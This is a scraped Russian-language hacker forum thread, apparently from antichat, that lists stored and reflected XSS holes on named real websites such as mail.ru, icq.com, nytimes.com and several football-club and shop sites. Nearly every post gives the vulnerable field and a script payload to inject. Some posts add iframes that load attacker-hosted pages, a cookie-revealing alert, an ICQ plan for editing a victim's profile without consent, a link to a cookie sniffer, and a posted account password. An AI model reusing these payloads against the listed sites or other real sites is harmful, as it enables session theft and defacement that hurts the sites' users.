![]() |
http://www.oops.ru/stat/se.php
активная xss на официальном российском сайте популярного журнала OOPS описание тут: https://forum.antichat.ru/thread55136.html |
http://www.qr.ru/stat/se.php
активная xss на официальном российском сайте популярного журнала Quattroruote описание тут: https://forum.antichat.ru/thread55136.html |
Простенькая активка на My.mail.ru
Заходим в раздел *Желания* ->>Добавить желание... Уязвимо поле *Метки* ... Пример Код:
http://my.mail.ru/my/wishlist?wish=313616P.S Активка уже не работает....10 часов прожила) .ПРЕВЕД АДМИНАМ МАЙЛА..И ЛИЧНО ЗАКЕРУ.....Знаю ещё одну..но больше не надейтесь, что я тут выложу) |
webfile.ru
загружаем картинку\пдф\тхт файлы со скриптом. скрипт выполняется при открытии файла. |
Активная XSS на http://www.scandasia.com/
Уязвимость в комментариях к новостям в поле Your comment: Например: http://www.scandasia.com/viewNews.php?coun_code=dk&news_id=4009 |
Цитата:
add сейчас пробовал отправлять файлы типов: jpg xml txt pdf, все прекрасно везде работает %) |
Цитата:
|
www.todj.ua - главный клубный портал Украины
В своем профиле, в разделе фото: topdj.ua/clubbers/ваш_id/photo/ создаем новую галерею и в поле "название" вписываем js-код. Поле "клуб" вообще нигде не отображается, а "описание"- фильтруется. Found by: /me |
Вот моя активная xss:
_http://job.properm.ru/ _http://auto.properm.ru/ Заполняем вакансию, резюме, объявление, и в поле ФИО пишем Код:
Иванов Иван <script>alert(/ xss /)</script>Заходим на сайт _http://www.virtualflowers.ru/abook.php Регестрируемся [ регистрация там фуфло какое-то ;) ] Добавить адресата - в каментах Код:
<script>alert(/ Dreel /)</script>http://www.slando.com.ua/images/slando.gif Бесплатные объявления Киева Заходим по адресу http://www.slando.com.ua и тыкаем кнопочку "подать объявление" продажа авто, уязвимо поле модель: <script>alert(/ D /)</script> Есть один недостаток - максимум 30 символов. |
ero-club.ru
В своем профиле давим "добавить новое фото" - создаем новый альбом и в поле"Название" пишем ядовитый код Код HTML:
<script>alert(/iddqd/)</script> |
http://www.knor.ru/cgi-bin/mag.pl?otziv гостевая полный набор и пасиф и актив
<script>alert(/отжиг/)</script> зы то что, вчера написано было потерли... а баг видимо не хотят исправлять ну и ладно, я не в обиде, действительно, кому охота копаться в коде, тем более если он не твой :D ) |
http://news.nag.ru/news/root/crnews/
Уязвимы комментарии. Код:
http://news.nag.ru/news/root/crnews/story15827/ |
Цитата:
PHP код:
PHP код:
PHP код:
PHP код:
PHP код:
GreenBear Сниффер от netsec.ru http://forum.antichat.ru/thread36829-%F1%ED%E8%F4%F4%E5%F0.html |
Цитата:
|
www.shinovozoff.ru - онлайн магазин авто-товаров
http://www.shinovozoff.ru/guestbook/ уязвимы все поля ввода, результат =) |
www.jino-net.ru
у себя в контрольной панели в поле подсказка пароля пишешь: Код:
<script>alert(document.cookie)</script>www.jino-net.ru/lostpass.phtml?login=ЛОГИН и выскакивает алерт с куками |
Код:
gamer.kraslan.ruКод:
<iframe src= http://you-money.100webspace.net <Код:
http://gamer.crownet.ru/index.php?name=Game&pa=preview_game&id=791 |
auto05.ru
Код:
http://www.auto05.ru/guestbook.html?page=1redyarsk.ru Код:
http://www.redyarsk.ru/gb/index.php?t=1&all= |
уууу блин
http://www.pressofatlanticcity.com постим коммент к новости Код:
<IMG """><SCRIPT>alert("master gen")</SCRIPT>">рабочий вариант ! http://www.pressofatlanticcity.com/188/story/84175.html |
http://edsh.org/diskutime/post.php?action=edit&%20fid=24&tid=1172&pid=4303
в заголовке (Subjekti) пишите: <script>alert(/n1k70/)</script> |
Вот
http://www.lugarus.com/users/haruka0000/ Сам скрипт прописывать в личном кабинете (зарегится надо) в поле "О себе". |
гы активка: http://www.hossi.is/index.php?option=com_n-gestabok&Itemid=43&do=listi
Пишем сообщение уязвимое поле: Heimasíða |
icq.com
план такой: создаётся номер icq, в детали пишется всюду где можно "><script>alert('x')</script> затем нужно залогиниться под этим номером на сайте icq.com и зайти по ссылке http://icq.com/people/full_details_update.php вылетит куча алертов =) нужно "помочь" юзеру логиниться за ваш номер. либо можно так: кинуть ссылку юзеру на отправку формы по ссылке http://icq.com/people/full_details_update.php с вашим кодом и потом опять его отправить на эту же страницу, так же вылетит алерт. тоесть отредактировать профиль юзера без его ведома.. но юзер должен быть залогинен, так что первый вариант лучше |
Извеняюсь за повторение
www.omen.ru <script>alert(\'Хss\')</script> уязвимые поля Ищу рост от: Ищу рост до: Ищу вес от: Ищу вес до: |
www.26thavenue.com
Регимся на форуме: Код:
http://www.26thavenue.com/index.php?action=main.forumsКод:
<script>alert("Antichat")</script> |
Цитата:
Кроме этого в bMail (типа личные сообщения) уязвимо для простейшей XSS поле Subject. Так же просто вставляем Код:
<script>alert(/Xss/)</script>Link URL, Link Title. Код:
"><script>alert()</script>Цитата:
Кроме этого есть пассивные XSS в этом движке, пример - Код:
http://www.26thavenue.com/bspeakdemo/index.php?action=login&msg=%3Cscript%3Ealert()%3C/script%3EКод:
http://www.26thavenue.com/bspeakdemo/index.php?action=retrieve&msg=%3Cscript%3Ealert()%3C/script%3E |
www.nytimes.com
Ну собственно онлайн версия газеты нью йорк таймс :) Нужно имять статут зарегенного пользователя когда герегились постим коммент б блоге типа Код:
<irame src=http://you.site.com/xss.html <содержашую Код:
<script>alert(/XSS/)<script> |
lovas.ru
вообще бараги какие то, не люблю барыг Заводим ак. Грузим фотку к ней добавляем коментарий с нашим кодом напрмер таким </SCRIPT>">'><SCRIPT>alert(4)</SCRIPT> Возможно есть и sql inj с помощью подзапросов к БД, вывел юзера 'lovas'@'localhost :) |
bronepoezd.ru
в гостевой в поле сообщение пишем [.img]http://img.yandex.net/i/yandex-v9.gif Onload=alert()[./img] без точек в бб теге |
file.mail.ru
narod.yandex.ru/disk/ заливаем файл со скриптом, который, при открытии файла, выполнится. |
domex.ru
Уязвимые поля: Площадь (м2) Цена В уязвимых полях пишем: "><script>alert()</script> |
bloggerswap.com
Заводим акк на этом ресурсе затем редактируем инфо Edit Account Details в поле Website Name: добавим наш код: ">'><SCRIPT>alert(4)</SCRIPT> ;) жмем edit my account |
Цитата:
+++++++++++++++++++++++++++++++++++ |
ehbsr.com
не люблю я все таки американцев :) Нужно иметь статус зерегнного пользователя вот: User:birch64 password:ywrcws тыкаем мой аккаунт и в поле fist name втыкаем: Код:
<img"""><script>alert(/ЛЯ ПА ПАМ/)</script> |
Футбольный клуб "Москва"
http://www.fcmoscow.ru/ru/registration Уязвимые поля: Фамилия Имя Отчество NickName Место Жительства В уязвимых полях пишем: "><script>alert()</script> ------------------------------------------------------------------------ Футбольный клуб "Луч-Энергия" www.luch-energy.ru/?search Уязвимое поле: Ваш запрос В уязвимом поле пишем: "><script>alert()</script> ------------------------------------------------------------------------ Футбольный клуб "Локомотив" http://www.fclm.ru/s-info-center/ Пишем: "><script>alert()</script> ------------------------------------------------------------------------ Футбольный клуб "Амкар" http://www.amkar.ru/reg/reg.asp Уязвимые поля: Логин Город Веб-Сайт В уязвимых полях пишем: "><script>alert()</script> Регестрируемся Заходим Вылетает Алерт |
хостинг картинок
http://images.i-files.org/ в поле описание пишем "><script>alert()</script> загружаем картинку, потом берем Ссылка на изображение: заходим по ссылке и вылетает алерт ------------------------------- "Знаменитый" украинский хотинг файлов upload.com.ua Заходим в аккаунт и создаем каталог с названием "><script>alert()</script> Получаем активную xss ;) PS upload уже профиксили :( |
http://ul-rocksite.info
Переходит на страницу чата: http://ul-rocksite.info/index.php?page=chat И в чате рисуем следующее: <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> OPera Версия 9.23 |
Цитата:
|
mail.ru
http://forum.hi-tech.mail.ru/ уязвимо поле "Заголовок:" всеравно скоро прикроют, так что выкладываю - играйтесь) |
кстате и на forum.lady.mail.ru тоже работает)
|
| Время: 06:54 |